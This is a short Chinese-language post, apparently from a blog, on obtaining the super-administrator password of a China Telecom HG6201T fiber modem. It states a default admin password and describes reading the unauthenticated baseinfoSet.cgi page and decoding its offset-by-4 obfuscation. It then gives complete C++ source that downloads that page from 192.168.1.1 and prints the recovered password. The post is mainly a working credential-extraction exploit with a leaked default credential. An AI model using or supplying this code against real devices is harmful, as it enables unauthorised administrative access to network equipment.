破解电信光猫 HG6201T 超管账号密码 (C语言源代码)

电信光猫 HG6201T 超管账号密码 维护结束前默认为:nE7jA%5m 维护结束 后获取密码方法如下

 

1，登录路由器的banseinfo页面， 获取baseinfo信息baseinfo地址：http://192.168.1.1:8080/cgi-bin/baseinfoSet.cgi

2，通过对比路由器上明文标注的普通账号的密码， 猜出加密方式， 解析加密后的ascii编码
3，解析ascii编码，以&符号为分隔符， split字符串， 拿到数组， 每一个数字减去4就得到ascii编码， 转成字符串拼接起来。
 超管密码前面telecomadmin固定，后面8位数字偏移量为0不是4.

#include
#include
#include
#include
#include
#pragma comment(lib, "urlmon.lib")
using namespace std;
int main() {
	HRESULT hr = URLDownloadToFile(nullptr,"http://192.168.1.1:8080/cgi-bin/baseinfoSet.cgi","passwd",0,0);
	if (hr != S_OK)
	{
		cout << "下载失败程序退出 ! ! !" << endl;
		return 1;
	}
	else
	{
		cout << "下载成功" << endl;
	}
	FILE* Fcgi = nullptr;
	char bash[32] = "";
	/*UINT num[512] = {O}, n;*/
	unsigned char TPassword[64] = { 0 };
	errno_t err = 0;
	long fnum = 0;
	err = fopen_s(&Fcgi, "passwd", "rb");
	if (err == 0)
	{
		cout << "文件打开成功 * * *" << endl;
		
		if (0 != Fcgi)
		{
			while (true)
			{
				memset(bash, 0, 32);
				fscanf_s(Fcgi, "%[^\"_]%*c", bash, 32);
				if (fnum == ftell(Fcgi))
				{
					//fseek(Fcgi, 1, SEEK_CUR);
					fseek(Fcgi, 1, 1);
				}
				fnum = ftell(Fcgi);
				if (!strcmp(bash, "TELECOMPASSWORD"))
				{
					fread_s(bash, 2, 1, 2, Fcgi);
					memset(TPassword, 0, 64);
					for (size_t i = 0; i < 64; i++)
					{
						fscanf_s(Fcgi, "%hhu&]", &TPassword[i]);
						if (TPassword[i] == 0) {
							break;
						}
					}
					break;
				}
			}
			for (size_t i = 0; i < 12; i++)
			{
				TPassword[i] -= 4;
			}
			cout <<"超级管理密码:"<< TPassword << endl;
			fclose(Fcgi);
		}
	}
	else {
		cout << "文件打开失败 ! ! !" << endl;
	}
    system("pause");
	return 0;
}

参考与https://www.right.com.cn/forum/thread-766435-1-1.html